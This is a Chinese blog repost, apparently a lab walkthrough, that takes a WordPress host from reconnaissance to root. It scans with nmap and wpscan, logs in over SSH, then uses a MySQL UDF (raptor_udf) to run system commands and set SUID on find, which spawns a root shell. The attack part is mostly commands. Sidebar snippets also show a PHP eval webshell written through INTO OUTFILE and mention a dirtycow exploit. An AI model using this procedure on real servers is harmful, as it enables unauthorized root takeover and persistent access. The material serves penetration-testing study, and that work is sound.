mysql提权

最新推荐文章于 2024-05-29 14:48:53 发布
最新推荐文章于 2024-05-29 14:48:53 发布
阅读量308 收藏
点赞数
文章标签: 数据库 php
原文链接:https://juejin.im/post/5caaedf96fb9a05e233ca94b
版权

Namp 扫描ip端口
Cms 探测 wpscan kali 工具
Wpscan 扫描出来用户名。用用户名登录ssh
然后利用mysql UDF提权。

1.gcc -g -c raptor_udf.c 编译一下下载的c文件
2.gcc -g -shared -Wl,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
3.登录mysql
4.Create table foo(line blob);
5.scp raptor_udf2.so michael@192.168.111.136:/var/www/html/wordpress/
6.第五步是用来传递文件到目标服务器上的
7.Insertintofoovalues(load_file('/var/www/html/wordpress/raptor_udf5.so'));
8.select * from foo into dumpfile '/usr/lib/mysql/plugin/aaa.so';
9.create function do_system returns integer soname 'aaa.so';
10.select do_system('id > /tmp/out; chown michael.michael /tmp/out');
11.!Sh
12.cat /tmp/out
13.加载 select do_system('chmod u+s /usr/bin/find');
14.然后推出mysql 直接用

touch foo

find foo -exec 'whoami' ;
find foo -exec 'id' ;
find foo -exec '/bin/sh' ;

就是root权限

转载于:https://juejin.im/post/5caaedf96fb9a05e233ca94b

weixin_33949359
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql提权总结
weixin_45605374的博客
12-12 727
udf提权 UDF(user defined function)用户定义函数,是mysql的一次拓展连接⼝。用户可以通过自定义函数实现在mysql中⽆法例实现的功能,其新函数都可以在sql语句中添加中调使⽤,像调⽤本机函数⼀样。 前提条件 已经获取到数据库的账号、密码,可以远程连接到 mysql有写入文件的权限,即secure_file_priv的值为空。 show global variables like 'secure%'; mysql版本区别 1、MySQL<5.0,导出路径随意;
MYSQL5.6免安装版本问题总结
心静、世界就静
07-02 936
MYSQL免安装教程配置 自行百度,好多教程都说修改配置文件,但是百度配置文件,给出答案都不统一,所以,自我体验一点就是其实没有必要去修改配置文件,5.6版本自带my-default.ini,下载安装包之后,直接进行解压,然后配置环境,将bin目录路径添加到环境变量中的path中,以管理员身份运行命令窗体进行安装即可,对于编码集设置,在我们创建数据库的时候可以直接指定。 遇到的问题如下: 1...
数据库Mysql提权
最新发布
白帽黑客鹏哥的博客
05-29 975
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
利用mysql的几种提权方式
热门推荐
一个安全研究员
08-06 2万+
如题
暗月mysql全版本通杀提权神器使用教程&工具
Jim的博客
09-13 3466
mysql提权神器
weixin_30266829的博客
11-28 215
java -jar udf.jar 127.0.0.1 root 123456 [32/64] 转载于:https://www.cnblogs.com/chaoba/p/6110448.html
mysql提权工具
04-24
mysql自动提权工具,。。。。。。。。。。。。。。。。。。。。。。。
mysql提权udf
09-20
在网络安全领域,"mysql提权udf"常常指的是利用UDF进行权限提升的技巧,这对于渗透测试和系统安全评估至关重要。 MySQL提权通常涉及以下步骤: 1. **UDF编译与注入**:首先,你需要编写或找到一个能够执行系统命令...
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
必备神器->MYSQL高版本提权工具-V 2011
01-19
必备神器->MYSQL高版本提权工具-V 2011
星外下的mysql提权1
08-08
这篇文章是作者的经验总结,虽然没有详细列出每个步骤的具体技术细节,但它揭示了MySQL提权的一个基本过程,包括文件的获取、数据库的访问、版本识别以及利用UDF进行提权的思路。对于网络安全研究者和Web应用安全...
暗月mysql全版本通杀提权
06-21
暗月mysql全版本通杀提权
udf提权总结(Mysql)
Mikasa
05-06 860
什么是udf udf = ‘user defined function‘,即‘用户自定义函数’。 是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。 udf在mysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写。 既然支持自定义函数那么我们如果想定义一个可以执行系统命...
mysql写入一句话木马
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
Mysql注入上传木马提权
Jim的博客
09-13 1151
上传暗月大马
MariaDB数据库给用户授权
weixin_44257023的博客
03-26 5009
当你添加用户之后,默认是没有什么权限的,但有需要一些权限方便管理 MariaDB数据库授权(MySQL一样) 命令格式: grant 权限 on 库.表 to 用户名@'主机范围'; 授权mar作为管理员,但是不能创建用户 mar用户是我之前创建的用户,没有授权的,使用 show grants for mar@'192.168.56.%'; 命令查看(具体命令格式稍后) grant all on *.* to mar@'192.168.56.%'; 查看用户权限 命令格式: show grants
mysql root linux,Linux mysql root 提权
weixin_27228507的博客
05-05 159
*Usage:*$id*uid=500(raptor)gid=500(raptor)groups=500(raptor)*$gcc-g-craptor_udf.c*$gcc-g-shared-W1,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc*$mysql-uroot-p*Enterpa...
mysql 注入 提权_记一次安全测试从sql注入到getshell到root提权
weixin_27207591的博客
01-19 355
//// This exploit uses the pokemon exploit of the dirtycow vulnerability// as a base and automatically generates a new passwd line.// The user will be prompted for the new password when the binary is ...
网络安全中 mysql提权原理
06-07
MySQL 提权漏洞通常指攻击者在 MySQL 服务器上通过一些手段获得了普通用户的权限,然后通过利用 MySQL 服务器的漏洞或者本身存在的配置问题提升到管理员或者 root 用户权限。下面简单介绍一下可能导致 MySQL 提权漏洞的原因: 1. 未授权访问:MySQL 服务器有时会默认创建一些测试用户,如果这些用户的密码没有被重置或者未被删除,攻击者可以使用这些用户的身份登录 MySQL 服务器,进而获取敏感信息或者提升权限。 2. 注入漏洞:由于 MySQL 是基于 SQL 语言的数据库,因此会存在 SQL 注入漏洞。攻击者可以通过注入恶意 SQL 语句,从而绕过身份验证机制,获取管理员权限。 3. 命令执行漏洞:在某些情况下,攻击者可以通过 MySQL 服务器执行恶意命令,从而获取服务器上的管理员权限。 4. 特权用户滥用:在 MySQL 中,特权用户(如 root 用户)通常具有更高的权限,可以执行一些可危的操作。如果攻击者通过某种方式获取了特权用户的密码或者访问权限,就可以利用这些权限进行提权攻击。 总之,防范 MySQL 提权漏洞需要从多个方面入手,包括加强身份验证、限制特权用户的权限、修复已知的漏洞等。此外,及时更新 MySQL 服务器的补丁也是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值